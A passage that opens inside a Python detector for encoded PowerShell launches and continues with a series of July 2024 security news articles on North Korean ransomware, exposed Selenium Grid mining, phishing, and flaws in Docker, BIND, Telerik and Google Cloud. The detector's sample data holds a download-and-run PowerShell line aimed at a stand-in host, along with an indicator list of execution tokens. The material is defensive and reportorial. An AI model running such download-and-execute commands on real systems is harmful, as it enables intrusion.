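     "cmd": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"parent": "cmd.exe",
     "cmd": "powershell -EncodedCommand " + encode_ps("Get-Date")},
    {"parent": "explorer.exe",
     "cmd": "powershell -ep bypass -EncodedCommand "
            + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')")},
]

# Matches -e, -ec, -enc and -EncodedCommand followed by a base64 blob.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
# Substrings that mark staging or in-memory execution in the decoded script.
INDICATORS = ("mshta", ".hta", "downloadstring", "invoke-expression", "iex",
              "invoke-webrequest", "frombase64string", "net.webclient")
# Parents implying a human typed or pasted the command (Run dialog, interactive shell).
# This set is an assumption for the heuristic, not a complete list.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "windowsterminal.exe"}


def analyze_event(event: Dict[str, str]) -> Optional[Dict]:
    """Return an alert dict for an encoded PowerShell launch with download/HTA indicators, else None."""
    match = ENC_FLAG.search(event["cmd"])
    if not match:
        return None
    try:
        script = decode_ps(match.group(1))
    except ValueError:  # malformed base64 (binascii.Error is a ValueError)
        return None
    hits = [token for token in INDICATORS if token in script.lower()]
    if not hits:
        return None
    return {
        "parent": event["parent"],
        "script": script,
        "indicators": hits,
        "user_launched": event["parent"].lower() in INTERACTIVE_PARENTS,
    }


def scan_events(events: List[Dict[str, str]]) -> List[Dict]:
    return [alert for alert in (analyze_event(e) for e in events) if alert]


if __name__ == "__main__":
    for alert in scan_events(SAMPLE_EVENTS):
        print(f"[{alert['parent']}] user_launched={alert['user_launched']} "
              f"indicators={alert['indicators']}\n    {alert['script']}")
```

The `user_launched` flag is what separates ClickFix from the far more common encoded-command noise generated by management agents: an encoded command spawned from `services.exe` or a scheduled task is routine, one spawned from `explorer.exe` that immediately calls `mshta` against a remote `.hta` is the lure described above.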
U.S. DoJ Indicts North Korean Hacker for Ransomware Attacks on Hospitals
27.7.24
BigBrothers The Hacker News
The U.S. Department of Justice (DoJ) on Thursday unsealed an indictment against a North Korean military intelligence operative for allegedly carrying out ransomware attacks against healthcare facilities in the country and funneling the payments to orchestrate additional intrusions into defense, technology, and government entities across the world.
"Rim Jong Hyok and his co-conspirators deployed ransomware to extort U.S. hospitals and health care companies, then laundered the proceeds to help fund North Korea's illicit activities," said Paul Abbate, deputy director of the Federal Bureau of Investigation (FBI). "These unacceptable and unlawful actions placed innocent lives at risk."
Concurrent with the indictment, the U.S. Department of State announced a reward of up to $10 million for information that could lead to his whereabouts, or the identification of other individuals in connection with the malicious activity.
Rim Jong Hyok, part of a hacking crew dubbed Andariel (aka APT45, Nickel Hyatt, Onyx Sleet, Silent Chollima, Stonefly, and TDrop2), is said to be behind extortion-related cyber attacks involving a ransomware strain called Maui, which was first disclosed in 2022 as targeting organizations in Japan and the U.S.
The ransom payments were laundered through Hong Kong-based facilitators, converting the illicit proceeds into Chinese yuan, following which they were withdrawn from an ATM and used to procure virtual private servers (VPSes) that, in turn, were employed to exfiltrate sensitive defense and technology information.
Targets of the campaign include two U.S. Air Force bases, NASA-OIG, as well as South Korean and Taiwanese defense contractors and a Chinese energy company.
In one instance highlighted by the State Department, a cyber attack that began in November 2022 led to the threat actors exfiltrating more than 30 gigabytes of data from an unnamed U.S.-based defense contractor. This comprised unclassified technical information regarding material used in military aircraft and satellites.
The agencies have also announced the "interdiction of approximately $114,000 in virtual currency proceeds of ransomware attacks and related money laundering transactions, as well as the seizure of online accounts used by co-conspirators to carry out their malicious cyber activity."
Andariel, affiliated with the Reconnaissance General Bureau (RGB) 3rd Bureau, has a track record of striking foreign businesses, governments, aerospace, nuclear, and defense industries with the goal of obtaining sensitive and classified technical information and intellectual property to further the regime's military and nuclear aspirations.
Other recent targets of interest encompass South Korean educational institutions, construction companies, and manufacturing organizations.
"This group poses an ongoing threat to various industry sectors worldwide, including, but not limited to, entities in the United States, South Korea, Japan, and India," the National Security Agency (NSA) said. "The group funds their espionage activity through ransomware operations against U.S. healthcare entities."
Initial access to target networks is accomplished by means of exploiting known N-day security flaws in internet-facing applications, enabling the hacking group to conduct follow-on reconnaissance, filesystem enumeration, persistence, privilege escalation, lateral movement, and data exfiltration steps using a combination of custom backdoors, remote access trojans, off-the-shelf tools, and open-source utilities at their disposal.
Other documented malware distribution vectors entail the use of phishing emails containing malicious attachments, such as Microsoft Windows Shortcut (LNK) files or HTML Application (HTA) script files inside ZIP archives.
"The actors are well-versed in using native tools and processes on systems, known as living-off-the-land (LotL)," the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said. "They use Windows command line, PowerShell, Windows Management Instrumentation command line (WMIC), and Linux bash, for system, network, and account enumeration."
Microsoft, in its own advisory on Andariel, described it as constantly evolving its toolset to add new functionality and implement novel ways to bypass detection, while exhibiting a "fairly uniform attack pattern."
"Onyx Sleet's ability to develop a spectrum of tools to launch its tried-and-true attack chain makes it a persistent threat, particularly to targets of interest to North Korean intelligence, like organizations in the defense, engineering, and energy sectors," the Windows maker noted.
Some of the noteworthy tools highlighted by Microsoft are listed below -
TigerRAT - A malware that can steal confidential information and carry out commands, like keylogging and screen recording, from a command-and-control (C2) server
SmallTiger - A C++ backdoor
LightHand - A lightweight backdoor for remote access to infected devices
ValidAlpha (aka Black RAT) - A Go-based backdoor that can run an arbitrary file, list contents of a directory, download a file, take screenshots, and launch a shell to execute arbitrary commands
Dora RAT - A "simple malware strain" with support for reverse shell and file download/upload capabilities
"They have evolved from targeting South Korean financial institutions with disruptive attacks to targeting U.S. healthcare with ransomware, known as Maui, although not at the same scale as other Russian speaking cybercrime groups," Alex Rose, director of threat research and government partnerships at Secureworks Counter Threat Unit, said.
"This is in addition to their primary mission of gathering intelligence on foreign military operations and strategic technology acquisition."
Andariel is just one of the myriad state-sponsored hacking crews operating under the direction of the North Korean government and military, alongside other clusters tracked as the Lazarus Group, BlueNoroff, Kimsuky, and ScarCruft.
"For decades, North Korea has been involved in illicit revenue generation through criminal enterprises, to compensate for the lack of domestic industry and their global diplomatic and economic isolation," Rose added.
"Cyber was rapidly adopted as a strategic capability that could be used for both intelligence gathering and money making. Where historically these objectives would have been covered by different groups, in the last few years there has been a blurring of the lines and many of the cyber threat groups operating on behalf of North Korea have also dabbled in money making activities."
Ongoing Cyberattack Targets Exposed Selenium Grid Services for Crypto Mining
27.7.24
Cryptocurrency The Hacker News
Cybersecurity researchers are sounding the alarm over an ongoing campaign that's leveraging internet-exposed Selenium Grid services for illicit cryptocurrency mining.
Cloud security firm Wiz is tracking the activity under the name SeleniumGreed. The campaign, which is targeting older versions of Selenium (3.141.59 and prior), is believed to be underway since at least April 2023.
"Unbeknownst to most users, Selenium WebDriver API enables full interaction with the machine itself, including reading and downloading files, and running remote commands," Wiz researchers Avigayil Mechtinger, Gili Tikochinski, and Dor Laska said.
"By default, authentication is not enabled for this service. This means that many publicly accessible instances are misconfigured and can be accessed by anyone and abused for malicious purposes."
Selenium Grid, part of the Selenium automated testing framework, enables parallel execution of tests across multiple workloads, different browsers, and various browser versions.
"Selenium Grid must be protected from external access using appropriate firewall permissions," the project maintainers warn in its support documentation, stating that failing to do so could allow third-parties to run arbitrary binaries and access internal web applications and files.
Exactly who is behind the attack campaign is currently not known. However, it involves the threat actor targeting publicly exposed instances of Selenium Grid and making use of the WebDriver API to run Python code responsible for downloading and running an XMRig miner.
It starts with the adversary sending a request to the vulnerable Selenium Grid hub with an aim to execute a Python program containing a Base64-encoded payload that spawns a reverse shell to an attacker-controlled server ("164.90.149[.]104") in order to fetch the final payload, a modified version of the open-source XMRig miner.
"Instead of hardcoding the pool IP in the miner configuration, they dynamically generate it at runtime," the researchers explained. "They also set XMRig's TLS-fingerprint feature within the added code (and within the configuration), ensuring the miner will only communicate with servers controlled by the threat actor."
The IP address in question is said to belong to a legitimate service that has been compromised by the threat actor, as it has also been found to host a publicly exposed Selenium Grid instance.
Wiz said it's possible to execute remote commands on newer versions of Selenium and that it identified more than 30,000 instances exposed to remote command execution, making it imperative that users take steps to close the misconfiguration.
"Selenium Grid is not designed to be exposed to the internet and its default configuration has no authentication enabled, so any user that has network access to the hub can interact with the nodes via API," the researchers said.
"This poses a significant security risk if the service is deployed on a machine with a public IP that has inadequate firewall policy."
CrowdStrike Warns of New Phishing Scam Targeting German Customers
27.7.24
Phishing The Hacker News
CrowdStrike is warning of an unknown threat actor attempting to capitalize on the
Falcon Sensor update fiasco to distribute dubious installers targeting German
customers as part of a highly targeted campaign.
The cybersecurity company said it identified what it described as an unattributed spear-phishing attempt on July 24, 2024, distributing an inauthentic CrowdStrike Crash Reporter installer via a website impersonating an unnamed German entity.
The imposter website is said to have been created on July 20, a day after the botched update crashed nearly 9 million Windows devices, causing extensive IT disruptions across the world.
"After the user clicks the Download button, the website leverages JavaScript (JS) that masquerades as JQuery v3.7.1 to download and deobfuscate the installer," CrowdStrike's Counter Adversary Operations team said.
"The installer contains CrowdStrike branding, German localization, and a password [is] required to continue installing the malware."
Specifically, the spear-phishing page featured a download link to a ZIP archive file containing a malicious InnoSetup installer, with the malicious code serving the executable injected into a JavaScript file named "jquery-3.7.1.min.js" in an apparent effort to evade detection.
Users who end up launching the bogus installer are then prompted to enter a "Backend-Server" to proceed further. CrowdStrike said it was unable to recover the final payload deployed via the installer.
The campaign is assessed to be highly targeted owing to the fact that the installer is password-protected and requires input that's likely only known to the targeted entities. Furthermore, the presence of the German language suggests that the activity is geared towards German-speaking CrowdStrike customers.
"The threat actor appears to be highly aware of operations security (OPSEC) practices, as they have focused on anti-forensic techniques during this campaign," CrowdStrike said.
"For example, the actor registered a subdomain under the it[.]com domain, preventing historical analysis of the domain-registration details. Additionally, encrypting the installer contents and preventing further activity from occurring without a password precludes further analysis and attribution."
The development comes amid a wave of phishing attacks taking advantage of the
CrowdStrike update issue to propagate stealer malware -
A phishing domain crowdstrike-office365[.]com that hosts rogue archive files
containing a Microsoft Installer (MSI) loader that ultimately executes a
commodity information stealer called Lumma.
A ZIP file ("CrowdStrike Falcon.zip") that contains a Python-based information
stealer tracked as Connecio that collects system information, external IP
address, and data from various web browsers, and exfiltrates them to SMTP
accounts listed on a Pastebin dead-drop URL.
On Thursday, CrowdStrike's CEO George Kurtz said 97% of the Windows devices that
went offline during the global IT outage are now operational.
"At CrowdStrike, our mission is to earn your trust by safeguarding your operations. I am deeply sorry for the disruption this outage has caused and personally apologize to everyone impacted," Kurtz said. "While I can't promise perfection, I can promise a response that is focused, effective, and with a sense of urgency."
Previously, the company's chief security officer Shawn Henry apologized for failing to "protect good people from bad things," and that it "let down the very people we committed to protect."
"The confidence we built in drips over the years was lost in buckets within hours, and it was a gut punch," Henry acknowledged. "We are committed to re-earning your trust by delivering the protection you need to disrupt the adversaries targeting you. Despite this setback, the mission endures."
Meanwhile, Bitsight's analysis of traffic patterns exhibited by CrowdStrike machines across organizations globally has revealed two "interesting" data points that it said warrant additional investigation.
"Firstly, on July 16 at around 22:00 there was a huge traffic spike, followed by a clear and significant drop off in egress traffic from organizations to CrowdStrike," security researcher Pedro Umbelino said. "Second, there was a significant drop, between 15% and 20%, in the number of unique IPs and organizations connected to CrowdStrike Falcon servers, after the dawn of the 19th."
"While we can not infer what the root cause of the change in traffic patterns on the 16th can be attributed to, it does warrant the foundational question of 'Is there any correlation between the observations on the 16th and the outage on the 19th?'"
Update
While the full impact of the IT outage remains to be tallied, cloud insurance
services firm Parametrix Solutions estimates that the event impacted nearly a
quarter of the Fortune 500 companies, resulting in a direct financial loss of
$5.4 billion (excluding Microsoft), including $1.94 billion in losses for
healthcare, $1.15 billion for banking, and $0.86 billion for the airlines
sector.
John Cable, vice president of program management for Windows servicing and delivery, said the incident "underscores the need for mission-critical resiliency within every organization."
"These improvements must go hand in hand with ongoing improvements in security and be in close cooperation with our many partners, who also care deeply about the security of the Windows ecosystem," Cable said, urging enterprises to have a major incident response plan (MIRP) in place, periodically take data backups, utilize deployment rings, and enable Windows security baselines.
With endpoint detection and response (EDR) software requiring kernel-level access to detect threats in Windows, the disruptive event also appears to have prompted Microsoft to rethink that approach entirely.
Redmond said alternative features like virtualization-based security (VBS) enclaves, which it introduced back in May, could be used by third-party developers to create an "isolated compute environment that does not require kernel mode drivers to be tamper resistant." Azure Attestation, another security solution, enables remote verification of the "trustworthiness of a platform and integrity of the binaries running inside it."
Critical Flaw in Telerik Report
Server Poses Remote Code Execution Risk
26.7.24
Vulnerability The Hacker News
Progress Software is urging users to update their Telerik Report Server
instances following the discovery of a critical security flaw that could result
in remote code execution.
The vulnerability, tracked as CVE-2024-6327 (CVSS score: 9.9), impacts Report Server version 2024 Q2 (10.1.24.514) and earlier.
"In Progress Telerik Report Server versions prior to 2024 Q2 (10.1.24.709), a remote code execution attack is possible through an insecure deserialization vulnerability," the company said in an advisory.
Deserialization flaws occur when an application reconstructs attacker-controlled data without adequate validation, which can result in the execution of unauthorized commands.
Progress Software said the flaw has been addressed in version 10.1.24.709. As a temporary mitigation, it's recommended to change the user for the Report Server Application Pool to one with limited permissions.
Administrators can check if their servers are vulnerable to attacks by going through these steps -
Go to the Report Server web UI and log in using an account with administrator rights.
Open the Configuration page (~/Configuration/Index).
Select the About tab; the version number will be displayed in the pane on the right.
The disclosure comes nearly two months after the company patched another
critical shortcoming in the same software (CVE-2024-4358, CVSS score: 9.8) that
could be abused by a remote attacker to bypass authentication and create rogue
administrator users.
North Korean Hackers Shift from
Cyber Espionage to Ransomware Attacks
26.7.24
Ransom The Hacker News
A North Korea-linked threat actor known for its cyber espionage operations has
gradually expanded into financially-motivated attacks that involve the
deployment of ransomware, setting it apart from other nation-state hacking
groups linked to the country.
Google-owned Mandiant is tracking the activity cluster under a new moniker APT45, which overlaps with names such as Andariel, Nickel Hyatt, Onyx Sleet, Stonefly, and Silent Chollima.
"APT45 is a long-running, moderately sophisticated North Korean cyber operator that has carried out espionage campaigns as early as 2009," researchers Taylor Long, Jeff Johnson, Alice Revelli, Fred Plan, and Michael Barnhart said. "APT45 has been the most frequently observed targeting critical infrastructure."
It's worth mentioning that APT45, along with APT38 (aka BlueNoroff), APT43 (aka Kimsuky), and Lazarus Group (aka TEMP.Hermit), are elements within North Korea's Reconnaissance General Bureau (RGB), the nation's premier military intelligence organization.
APT45 is notably linked to the deployment of ransomware families tracked as SHATTEREDGLASS and Maui targeting entities in South Korea, Japan, and the U.S. in 2021 and 2022. Details of SHATTEREDGLASS were documented by Kaspersky in June 2021.
"It is possible that APT45 is carrying out financially-motivated cybercrime not
only in support of its own operations but to generate funds for other North
Korean state priorities," Mandiant said.
Another prominent malware in its arsenal is a backdoor dubbed Dtrack (aka Valefor and Preft), which was first used in a cyber attack aimed at the Kudankulam Nuclear Power Plant in India in 2019, marking one of the few publicly known instances of North Korean actors striking critical infrastructure.
"APT45 is one of North Korea's longest running cyber operators, and the group's activity mirrors the regime's geopolitical priorities even as operations have shifted from classic cyber espionage against government and defense entities to include healthcare and crop science," Mandiant said.
"As the country has become reliant on its cyber operations as an instrument of national power, the operations carried out by APT45 and other North Korean cyber operators may reflect the changing priorities of the country's leadership."
The findings come as security awareness training firm KnowBe4 said it was tricked into hiring an IT worker from North Korea as a software engineer, who used a stolen identity of a U.S. citizen and enhanced their picture using artificial intelligence (AI).
"This was a skillful North Korean IT worker, supported by a state-backed criminal infrastructure, using the stolen identity of a U.S. citizen participating in several rounds of video interviews and circumvented background check processes commonly used by companies," the company said.
The IT worker army, assessed to be part of the Workers' Party of Korea's Munitions Industry Department, has a history of seeking employment in U.S.-based firms by pretending to be located in the country when they are actually in China and Russia, and logging in remotely through company-issued laptops delivered to a "laptop farm."
KnowBe4 said it detected suspicious activities on the Mac workstation sent to the individual on July 15, 2024, at 9:55 p.m. EST that consisted of manipulating session history files, transferring potentially harmful files, and executing harmful software. The malware was downloaded using a Raspberry Pi.
Twenty-five minutes later, the Florida-based cybersecurity company said it
contained the employee's device. There is no evidence that the attacker gained
unauthorized access to sensitive data or systems.
"The scam is that they are actually doing the work, getting paid well, and giving a large amount to North Korea to fund their illegal programs," KnowBe4's chief executive Stu Sjouwerman said.
"This case highlights the critical need for more robust vetting processes, continuous security monitoring, and improved coordination between HR, IT, and security teams in protecting against advanced persistent threats."
Meta Removes 63,000 Instagram Accounts Linked to Nigerian Sextortion Scams
26.7.24
Social The Hacker News
Meta Platforms on Wednesday said it took steps to remove around 63,000 Instagram
accounts in Nigeria that were found to target people with financial sextortion
scams.
"These included a smaller coordinated network of around 2,500 accounts that we were able to link to a group of around 20 individuals," the company said. "They targeted primarily adult men in the U.S. and used fake accounts to mask their identities."
In cases where some of these accounts attempted to target minors, Meta said it reported them to the National Center for Missing and Exploited Children (NCMEC).
Separately, Meta said it also removed 7,200 assets, including 1,300 Facebook accounts, 200 Facebook Pages and 5,700 Facebook Groups, based in Nigeria that were used to organize, recruit and train new scammers.
"Their efforts included offering to sell scripts and guides to use when scamming people, and sharing links to collections of photos to use when populating fake accounts," it said.
Meta attributed the second cluster to a cybercrime group tracked as Yahoo Boys, which came under the radar earlier this year for orchestrating financial sextortion attacks targeting teenagers from Australia, Canada, and the U.S.
A subsequent report from Bloomberg exposed sextortion-fueled suicides, revealing how scammers are posing as teenage girls on Instagram and Snapchat to lure targets and entice them into sending explicit photos, which are then used to blackmail victims in exchange for money or risk getting their images forwarded to their friends.
Back in April, the social media giant said it has devised new methods to identify accounts that are potentially engaging in sextortion, and that it's enacting measures to prevent these accounts from finding and interacting with teens.
"Financial sextortion is a horrific crime that can have devastating consequences," Meta said. "This is an adversarial space where criminals evolve to evade our ever-improving defenses."
Meta's actions come as INTERPOL said it conducted a global law enforcement operation referred to as Jackal III that targeted West African organized crime groups such as Black Axe, leading to scores of arrests and the seizure of $3 million in illegal assets, including cryptocurrencies and luxury items.
The effort, which took place between April 10 and July 3, 2024, spanned 21 countries and was orchestrated with an aim to dismantle transnational organized crime syndicates involved in cyber fraud, human trafficking, drug smuggling, and violent crimes both within Africa and globally.
"The annual operation resulted in some 300 arrests, the identification of over
400 additional suspects, and the blocking of more than 720 bank accounts,"
INTERPOL said in a press statement.
The development also follows a wave of other law enforcement actions from across the world designed to tackle cybercrime -
Vyacheslav Igorevich Penchukov (aka father and tank), who
pleaded guilty at the start of the year for his role in the Zeus and IcedID
malware operations, was sentenced by a U.S. court to nine years in prison and
three years of supervised release. He was also ordered to pay $73 million in
restitution.
The Ukrainian Cyber Police announced the arrest of two people in connection with
financial theft attacks targeting "leading industrial enterprises" in the
country, leading to losses amounting to $145,000 (six million hryvnias). If
found guilty, they face up to 12 years in prison.
Spain's La Guardia Civil arrested three suspected members of NoName057(16),
prompting the pro-Russian hacktivist group to declare a "holy war" on the
country. The individuals have been accused of participating in "denial-of-service
cyber attacks against public institutions and strategic sectors of Spain and
other NATO countries." The group called the arrests a "witch hunt" by
Russophobic authorities.
The U.K. National Crime Agency (NCA) said it infiltrated and took down
digitalstress[.]su, a DDoS-for-hire (aka booter) service linked to "tens of
thousands of attacks every week" globally. The site's suspected owner, who goes
by the name Skiop, has also been arrested. The takedown, part of an ongoing
coordinated effort dubbed Operation PowerOFF, came after German police disrupted
the Stresser.tech DDoS attack service in April 2024.
Researchers Reveal ConfusedFunction Vulnerability in Google Cloud Platform
26.7.24
Vulnerability The Hacker News
Cybersecurity researchers have disclosed a privilege escalation vulnerability
impacting Google Cloud Platform's Cloud Functions service that an attacker could
exploit to access other services and sensitive data in an unauthorized manner.
Tenable has given the vulnerability the name ConfusedFunction.
"An attacker could escalate their privileges to the Default Cloud Build Service Account and access numerous services such as Cloud Build, storage (including the source code of other functions), artifact registry and container registry," the exposure management company said in a statement.
"This access allows for lateral movement and privilege escalation in a victim's project, to access unauthorized data and even update or delete it."
Cloud Functions refers to a serverless execution environment that allows developers to create single-purpose functions that are triggered in response to specific Cloud events without the need to manage a server or update frameworks.
The problem discovered by Tenable has to do with the fact that a Cloud Build service account is created in the background and linked to a Cloud Build instance by default when a Cloud Function is created or updated.
This service account opens the door for potential malicious activity owing to its excessive permissions, thereby permitting an attacker with access to create or update a Cloud Function to leverage this loophole and escalate their privileges to the service account.
This permission could then be abused to access other Google Cloud services that are also created in tandem with the Cloud Function, including Cloud Storage, Artifact Registry, and Container Registry. In a hypothetical attack scenario, ConfusedFunction could be exploited to leak the Cloud Build service account token via a webhook.
Following responsible disclosure, Google has updated the default behavior such
that Cloud Build uses the Compute Engine default service account to prevent
misuse. However, it's worth noting that these changes do not apply to existing
instances.
"The ConfusedFunction vulnerability highlights the problematic scenarios that may arise due to software complexity and inter-service communication in a cloud provider's services," Tenable researcher Liv Matan said.
"While the GCP fix has reduced the severity of the problem for future deployments, it didn't completely eliminate it. That's because the deployment of a Cloud Function still triggers the creation of the aforementioned GCP services. As a result, users must still assign minimum but still relatively broad permissions to the Cloud Build service account as part of a function's deployment."
The development comes as Outpost24 detailed a medium-severity cross-site scripting (XSS) flaw in the Oracle Integration Cloud Platform that could be weaponized to inject malicious code into the application.
The flaw, which is rooted in the handling of the "consumer_url" parameter, was resolved by Oracle in its Critical Patch Update (CPU) released earlier this month.
"The page for creating a new integration, found at https://<instanceid>.integration.ocp.oraclecloud.com/ic/integration/home/faces/link?page=integration&consumer_url=<payload>, did not require any other parameters," security researcher Filip Nyquist said.
"This meant that an attacker would only need to identify the instance-id of the
specific integration platform to send a functional payload to any user of the
platform. Consequently, the attacker could bypass the requirement of knowing a
specific integration ID, which is typically accessible only to logged-in users."
It also follows Assetnote's discovery of three security vulnerabilities in the ServiceNow cloud computing platform (CVE-2024-4879, CVE-2024-5178, and CVE-2024-5217) that could be fashioned into an exploit chain in order to gain full database access and execute arbitrary code within the context of the Now Platform.
The ServiceNow shortcomings have since come under active exploitation by unknown threat actors as part of a "global reconnaissance campaign" designed to gather database details, such as user lists and account credentials, from susceptible instances.
The activity, targeting companies in various industry verticals such as energy, data centers, software development, and government entities in the Middle East, could be leveraged for "cyber espionage and further targeting," Resecurity said.
(The story was updated after publication to include details about active exploitation of ServiceNow flaws.)
Critical Docker Engine Flaw Allows
Attackers to Bypass Authorization Plugins
26.7.24
Vulnerability The Hacker News
Docker is warning of a critical flaw impacting certain versions of Docker Engine
that could allow an attacker to sidestep authorization plugins (AuthZ) under
specific circumstances.
Tracked as CVE-2024-41110, the bypass and privilege escalation vulnerability carries a CVSS score of 10.0, indicating maximum severity.
"An attacker could exploit a bypass using an API request with Content-Length set to 0, causing the Docker daemon to forward the request without the body to the AuthZ plugin, which might approve the request incorrectly," the Moby Project maintainers said in an advisory.
Docker said the issue is a regression: it was originally discovered in 2018 and addressed in Docker Engine v18.09.1 in January 2019, but the fix was never carried over to subsequent versions (19.03 and later).
The issue has been resolved in versions 23.0.14 and 27.1.0 as of July 23, 2024,
after the problem was identified in April 2024. The following versions of Docker
Engine are impacted assuming AuthZ is used to make access control decisions -
<= v19.03.15
<= v20.10.27
<= v23.0.14
<= v24.0.9
<= v25.0.5
<= v26.0.2
<= v26.1.4
<= v27.0.3, and
<= v27.1.0
"Users of Docker Engine v19.03.x and later versions who do not rely on
authorization plugins to make access control decisions and users of all versions
of Mirantis Container Runtime are not vulnerable," Docker's Gabriela Georgieva
said.
"Users of Docker commercial products and internal infrastructure who do not rely on AuthZ plugins are unaffected."
It also affects Docker Desktop up to versions 4.32.0, although the company said the likelihood of exploitation is limited and it requires access to the Docker API, necessitating that an attacker already has local access to the host. A fix is expected to be included in a forthcoming release (version 4.33).
"Default Docker Desktop configuration does not include AuthZ plugins," Georgieva noted. "Privilege escalation is limited to the Docker Desktop [virtual machine], not the underlying host."
Although Docker makes no mention of CVE-2024-41110 being exploited in the wild, it's essential that users update their installations to the latest version to mitigate potential threats.
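An added example, not code from Docker or the Moby Project: a Python policy function for an authorization plugin that fails closed when a body-bearing request such as POST /containers/create arrives without its body, the situation the advisory describes, instead of approving an empty document. Field names follow the AuthZ plugin API; that RequestBody arrives as already-decoded bytes is an assumption, and the bind-mount and privileged checks are an illustrative policy.

```python
import json
import re

VERSION_PREFIX = re.compile(r"^/v\d+\.\d+")
# Endpoints whose meaning is carried entirely by the JSON body.
BODY_REQUIRED = ("/containers/create", "/exec")
FORBIDDEN_BIND_PREFIXES = ("/:", "/var/run/docker.sock:")


def api_path(uri: str) -> str:
    """Drop the query string and the /v1.xx API version prefix."""
    return VERSION_PREFIX.sub("", uri.split("?", 1)[0])


def authz_req(request: dict) -> dict:
    """Decide an /AuthZPlugin.AuthZReq call.

    `request` uses the field names of the Docker authorization plugin API
    (RequestMethod, RequestURI, RequestBody, ...); RequestBody is assumed to be the
    decoded bytes. The return value is the plugin's {"Allow", "Msg"} response.
    """
    method = request.get("RequestMethod", "")
    path = api_path(request.get("RequestURI", ""))
    body = request.get("RequestBody") or b""
    if method == "POST" and any(p in path for p in BODY_REQUIRED):
        if not body:
            # Fail closed: with no body there is nothing to judge, so the request is
            # refused rather than approved on an empty document (the CVE-2024-41110 case).
            return {"Allow": False, "Msg": f"no request body forwarded for {path}"}
        try:
            doc = json.loads(body)
        except ValueError as exc:
            return {"Allow": False, "Msg": f"unparseable request body: {exc}"}
        host = doc.get("HostConfig") or {}
        if host.get("Privileged"):
            return {"Allow": False, "Msg": "privileged containers are not permitted"}
        for bind in host.get("Binds") or []:
            if bind.startswith(FORBIDDEN_BIND_PREFIXES):
                return {"Allow": False, "Msg": f"host bind mount not permitted: {bind}"}
    return {"Allow": True, "Msg": ""}


if __name__ == "__main__":
    # Constructed sample: a privileged create request with its body, then the same
    # request as the daemon forwards it when Content-Length was 0, then a harmless GET.
    create = b'{"Image":"alpine","HostConfig":{"Privileged":true}}'
    for req in (
        {"User": "alice", "RequestMethod": "POST", "RequestURI": "/v1.45/containers/create", "RequestBody": create},
        {"User": "alice", "RequestMethod": "POST", "RequestURI": "/v1.45/containers/create", "RequestBody": b""},
        {"User": "alice", "RequestMethod": "GET", "RequestURI": "/v1.45/containers/json"},
    ):
        print(req["RequestMethod"], req["RequestURI"], "->", authz_req(req))
```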
Earlier this year, Docker moved to patch a set of flaws dubbed Leaky Vessels that could enable an attacker to gain unauthorized access to the host filesystem and break out of the container.
"As cloud services rise in popularity, so does the use of containers, which have become an integrated part of cloud infrastructure," Palo Alto Networks Unit 42 said in a report published last week. "Although containers provide many advantages, they are also susceptible to attack techniques like container escapes."
"Sharing the same kernel and often lacking complete isolation from the host's user-mode, containers are susceptible to various techniques employed by attackers seeking to escape the confines of a container environment."
CISA Warns of Exploitable
Vulnerabilities in Popular BIND 9 DNS Software
26.7.24
ICS The Hacker News
The Internet Systems Consortium (ISC) has released patches to address multiple
security vulnerabilities in the Berkeley Internet Name Domain (BIND) 9 Domain
Name System (DNS) software suite that could be exploited to trigger a denial-of-service
(DoS) condition.
"A cyber threat actor could exploit one of these vulnerabilities to cause a denial-of-service condition," the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said in an advisory.
The four vulnerabilities are listed below -
CVE-2024-4076 (CVSS score: 7.5) - Due to a logic error, lookups that triggered serving stale data and required lookups in local authoritative zone data could have resulted in an assertion failure.
CVE-2024-1975 (CVSS score: 7.5) - Validating DNS messages signed using the SIG(0) protocol could cause excessive CPU load, leading to a denial-of-service condition.
CVE-2024-1737 (CVSS score: 7.5) - It is possible to craft excessively large numbers of resource record types for a given owner name, which has the effect of slowing down database processing.
CVE-2024-0760 (CVSS score: 7.5) - A malicious DNS client that sent many queries over TCP but never read the responses could cause a server to respond slowly or not at all for other clients.
Successful exploitation of the aforementioned bugs could cause a named instance
to terminate unexpectedly, deplete available CPU resources, slow down query
processing by a factor of 100, and render the server unresponsive.
The flaws have been addressed in BIND 9 versions 9.18.28, 9.20.0, and 9.18.28-S1 released earlier this month. There is no evidence that any of the shortcomings have been exploited in the wild.
The disclosure comes months after the ISC addressed another flaw in BIND 9 called KeyTrap (CVE-2023-50387, CVSS score: 7.5) that could be abused to exhaust CPU resources and stall DNS resolvers, resulting in a denial-of-service (DoS).
New Chrome Feature Scans Password-Protected
Files for Malicious Content
26.7.24
Virus The Hacker News
Google said it's adding new security warnings when downloading potentially
suspicious and malicious files via its Chrome web browser.
"We have replaced our previous warning messages with more detailed ones that convey more nuance about the nature of the danger and can help users make more informed decisions," Jasika Bawa, Lily Chen, and Daniel Rubery from the Chrome Security team said.
To that end, the search giant is introducing a two-tier download warning taxonomy based on verdicts provided by Google Safe Browsing: Suspicious files and Dangerous files.
Each category comes with its own iconography, color, and text to distinguish them from one another and help users make an informed choice.
Google is also adding what's called automatic deep scans for users who have opted in to the Enhanced Protection mode of Safe Browsing in Chrome, so that they don't have to be prompted each time to send files to Safe Browsing for deep scanning before opening them.
In cases where such files are embedded within password-protected archives, users now have the option to "enter the file's password and send it along with the file to Safe Browsing so that the file can be opened and a deep scan may be performed."
Google emphasized that the files and their associated passwords are deleted a short time after the scan and that the collected data is only used for improving download protections.
"In Standard Protection mode, downloading a suspicious encrypted archive will also trigger a prompt to enter the file's password, but in this case, both the file and the password stay on the local device and only the metadata of the archive contents are checked with Safe Browsing," it said.
Telegram App Flaw Exploited to Spread Malware Hidden in Videos
25.7.24
Social The Hacker News
A zero-day security flaw in Telegram's mobile app for Android, called EvilVideo,
made it possible for attackers to share malicious files disguised as harmless-looking
videos.
The exploit appeared for sale for an unknown price in an underground forum on June 6, 2024, ESET said. Following responsible disclosure on June 26, the issue was addressed by Telegram in version 10.14.5 released on July 11.
"Attackers could share malicious Android payloads via Telegram channels, groups, and chat, and make them appear as multimedia files," security researcher Lukáš Štefanko said in a report.
It's believed that the payload is concocted using Telegram's application programming interface (API), which allows for programmatic uploads of multimedia files to chats and channels. In doing so, it enables an attacker to camouflage a malicious APK file as a 30-second video.
